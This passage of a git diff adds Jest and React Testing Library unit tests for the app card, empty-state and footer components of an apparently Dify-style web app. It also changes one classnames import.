+ + fireEvent.click(screen.getByTestId('close-switch-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('switch-modal')).not.toBeInTheDocument() + }) + }) + + it('should call onRefresh after successful switch', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + 
expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should open switch modal for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + }) + + describe('Open in Explore', () => { + it('should show open in explore option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.openInExplore')).toBeInTheDocument() + }) + }) + }) + + describe('Workflow Export with Environment Variables', () => { + it('should check for secret environment variables in workflow apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + + it('should show DSL export modal when workflow has secret variables', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({ + environment_variables: [{ value_type: 'secret', name: 'API_KEY' }], + }) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument() + }) + }) + + it('should check for secret environment variables in advanced chat apps', async () => { + const advancedChatApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + + 
fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + + it('should close DSL export modal when onClose is called', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({ + environment_variables: [{ value_type: 'secret', name: 'API_KEY' }], + }) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onClose + fireEvent.click(screen.getByTestId('close-dsl-export')) + + await waitFor(() => { + expect(screen.queryByTestId('dsl-export-modal')).not.toBeInTheDocument() + }) + }) + }) + + describe('Edge Cases', () => { + it('should handle empty description', () => { + const appNoDesc = { ...mockApp, description: '' } + render() + expect(screen.getByText('Test App')).toBeInTheDocument() + }) + + it('should handle long app name', () => { + const longNameApp = { + ...mockApp, + name: 'This is a very long app name that might overflow the container', + } + render() + expect(screen.getByText(longNameApp.name)).toBeInTheDocument() + }) + + it('should handle empty tags array', () => { + const noTagsApp = { ...mockApp, tags: [] } + // With empty tags, the component should still render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle missing author name', () => { + const noAuthorApp = { ...mockApp, author_name: '' } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle null icon_url', () => { + const nullIconApp = { ...mockApp, icon_url: null } + // With null icon_url, the 
component should fall back to emoji icon and render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should use created_at when updated_at is not available', () => { + const noUpdateApp = { ...mockApp, updated_at: 0 } + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + + it('should handle agent chat mode apps', () => { + const agentApp = { ...mockApp, mode: AppModeEnum.AGENT_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle advanced chat mode apps', () => { + const advancedApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle apps with multiple tags', () => { + const multiTagApp = { + ...mockApp, + tags: [ + { id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }, + { id: 'tag2', name: 'Tag 2', type: 'app', binding_count: 0 }, + { id: 'tag3', name: 'Tag 3', type: 'app', binding_count: 0 }, + ], + } + render() + // Verify the tag selector renders (actual tag display is handled by the real TagSelector component) + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should handle edit failure', async () => { + (appsService.updateAppInfo as jest.Mock).mockRejectedValueOnce(new Error('Edit failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Edit failed') }) + }) + }) + + it('should close edit modal after successful edit', async () => { + render() + + 
fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render all app modes correctly', () => { + const modes = [ + AppModeEnum.CHAT, + AppModeEnum.COMPLETION, + AppModeEnum.WORKFLOW, + AppModeEnum.ADVANCED_CHAT, + AppModeEnum.AGENT_CHAT, + ] + + modes.forEach((mode) => { + const testApp = { ...mockApp, mode } + const { unmount } = render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + unmount() + }) + }) + + it('should handle workflow draft fetch failure during export', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockRejectedValueOnce(new Error('Fetch failed')) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Additional Edge Cases for Coverage + // -------------------------------------------------------------------------- + describe('Additional Coverage', () => { + it('should handle onRefresh callback in switch modal success', async () => { + const chatApp = createMockApp({ mode: AppModeEnum.CHAT }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + // Trigger 
success callback + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render popover menu with correct styling for different app modes', async () => { + // Test completion mode styling + const completionApp = createMockApp({ mode: AppModeEnum.COMPLETION }) + const { unmount } = render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + + unmount() + + // Test workflow mode styling + const workflowApp = createMockApp({ mode: AppModeEnum.WORKFLOW }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should stop propagation when clicking tag selector area', () => { + const multiTagApp = createMockApp({ + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + }) + + render() + + const tagSelector = screen.getByLabelText('tag-selector') + expect(tagSelector).toBeInTheDocument() + + // Click on tag selector wrapper to trigger stopPropagation + const tagSelectorWrapper = tagSelector.closest('div') + if (tagSelectorWrapper) + fireEvent.click(tagSelectorWrapper) + }) + + it('should handle popover mouse leave', async () => { + render() + + // Open popover + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByTestId('popover-content')).toBeInTheDocument() + }) + + // Trigger mouse leave on the outer popover-content + fireEvent.mouseLeave(screen.getByTestId('popover-content')) + + await waitFor(() => { + expect(screen.queryByTestId('popover-content')).not.toBeInTheDocument() + }) + }) + + it('should handle operations menu mouse leave', async () => { + render() + + // Open popover + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + 
expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + + // Find the Operations wrapper div (contains the menu items) + const editButton = screen.getByText('app.editApp') + const operationsWrapper = editButton.closest('div.relative') + + // Trigger mouse leave on the Operations wrapper to call onMouseLeave + if (operationsWrapper) + fireEvent.mouseLeave(operationsWrapper) + }) + + it('should click open in explore button', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + // Verify openAsyncWindow was called with callback and options + await waitFor(() => { + expect(mockOpenAsyncWindow).toHaveBeenCalledWith( + expect.any(Function), + expect.objectContaining({ onError: expect.any(Function) }), + ) + }) + }) + + it('should handle open in explore via async window', async () => { + // Configure mockOpenAsyncWindow to actually call the callback + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise) => { + await callback() + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + const { fetchInstalledAppList } = require('@/service/explore') + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalledWith(mockApp.id) + }) + }) + + it('should handle open in explore API failure', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockRejectedValueOnce(new Error('API Error')) + + // Configure mockOpenAsyncWindow to call the callback and trigger error + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise, options: any) => { + try { + await callback() + } + catch (err) { + options?.onError?.(err) + } + }) + + render() + + 
fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + }) + + describe('Access Control', () => { + it('should render operations menu correctly', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + expect(screen.getByText('app.export')).toBeInTheDocument() + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + }) + + describe('Open in Explore - No App Found', () => { + it('should handle case when installed_apps is empty array', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockResolvedValueOnce({ installed_apps: [] }) + + // Configure mockOpenAsyncWindow to call the callback and trigger error + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise, options: any) => { + try { + await callback() + } + catch (err) { + options?.onError?.(err) + } + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + + it('should handle case when API throws in callback', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockRejectedValueOnce(new Error('Network error')) + + // Configure mockOpenAsyncWindow to call the callback without catching + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise) => { + return await callback() + }) + + render() + + 
fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + }) + + describe('Draft Trigger Apps', () => { + it('should not show open in explore option for apps with has_draft_trigger', async () => { + const draftTriggerApp = createMockApp({ has_draft_trigger: true }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + // openInExplore should not be shown for draft trigger apps + expect(screen.queryByText('app.openInExplore')).not.toBeInTheDocument() + }) + }) + }) + + describe('Non-editor User', () => { + it('should handle non-editor workspace users', () => { + // This tests the isCurrentWorkspaceEditor=true branch (default mock) + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + }) + + describe('WebApp Auth Enabled', () => { + beforeEach(() => { + mockWebappAuthEnabled = true + }) + + it('should show access control option when webapp_auth is enabled', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.accessControl')).toBeInTheDocument() + }) + }) + + it('should click access control button', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const accessControlBtn = screen.getByText('app.accessControl') + fireEvent.click(accessControlBtn) + }) + + await waitFor(() => { + expect(screen.getByTestId('access-control-modal')).toBeInTheDocument() + }) + }) + + it('should close access control modal and call onRefresh', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.accessControl')) + }) 
+ + await waitFor(() => { + expect(screen.getByTestId('access-control-modal')).toBeInTheDocument() + }) + + // Confirm access control + fireEvent.click(screen.getByTestId('confirm-access-control')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should show open in explore when userCanAccessApp is true', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.openInExplore')).toBeInTheDocument() + }) + }) + + it('should close access control modal when onClose is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.accessControl')) + }) + + await waitFor(() => { + expect(screen.getByTestId('access-control-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onClose + fireEvent.click(screen.getByTestId('close-access-control')) + + await waitFor(() => { + expect(screen.queryByTestId('access-control-modal')).not.toBeInTheDocument() + }) + }) + }) +}) diff --git a/web/app/components/apps/app-card.tsx b/web/app/components/apps/app-card.tsx index b8da0264e4..8140422c0f 100644 --- a/web/app/components/apps/app-card.tsx +++ b/web/app/components/apps/app-card.tsx @@ -5,7 +5,7 @@ import { useContext } from 'use-context-selector' import { useRouter } from 'next/navigation' import { useTranslation } from 'react-i18next' import { RiBuildingLine, RiGlobalLine, RiLockLine, RiMoreFill, RiVerifiedBadgeLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { type App, AppModeEnum } from '@/types/app' import Toast, { ToastContext } from '@/app/components/base/toast' import { copyApp, deleteApp, exportAppConfig, updateAppInfo } from '@/service/apps' diff --git a/web/app/components/apps/empty.spec.tsx b/web/app/components/apps/empty.spec.tsx new file mode 100644 index 
0000000000..8e7680958c --- /dev/null +++ b/web/app/components/apps/empty.spec.tsx @@ -0,0 +1,53 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import Empty from './empty' + +describe('Empty', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + + it('should render 36 placeholder cards', () => { + const { container } = render() + const placeholderCards = container.querySelectorAll('.bg-background-default-lighter') + expect(placeholderCards).toHaveLength(36) + }) + + it('should display the no apps found message', () => { + render() + // Use pattern matching for resilient text assertions + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + }) + + describe('Styling', () => { + it('should have correct container styling for overlay', () => { + const { container } = render() + const overlay = container.querySelector('.pointer-events-none') + expect(overlay).toBeInTheDocument() + expect(overlay).toHaveClass('absolute', 'inset-0', 'z-20') + }) + + it('should have correct styling for placeholder cards', () => { + const { container } = render() + const card = container.querySelector('.bg-background-default-lighter') + expect(card).toHaveClass('inline-flex', 'h-[160px]', 'rounded-xl') + }) + }) + + describe('Edge Cases', () => { + it('should handle multiple renders without issues', () => { + const { rerender } = render() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + + rerender() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/footer.spec.tsx b/web/app/components/apps/footer.spec.tsx new file mode 100644 index 0000000000..291f15a5eb --- /dev/null +++ b/web/app/components/apps/footer.spec.tsx @@ -0,0 +1,94 @@ +import React from 'react' 
+import { render, screen } from '@testing-library/react' +import Footer from './footer' + +describe('Footer', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render(